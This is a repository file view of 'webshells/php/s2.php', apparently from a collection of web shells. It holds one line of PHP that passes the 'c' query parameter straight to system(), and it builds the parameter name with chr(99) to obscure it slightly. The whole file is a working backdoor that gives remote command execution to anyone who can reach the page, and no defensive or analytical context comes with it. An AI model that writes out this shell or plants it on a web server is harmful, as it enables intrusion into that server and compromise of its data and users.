webshells/php/s2.php
2016-01-31 18:22:42 +02:00

1 line
No EOL
58 B
PHP
Executable file

<?php $c=chr(99);if(isset($_GET[$c]))system($_GET[$c]); ?>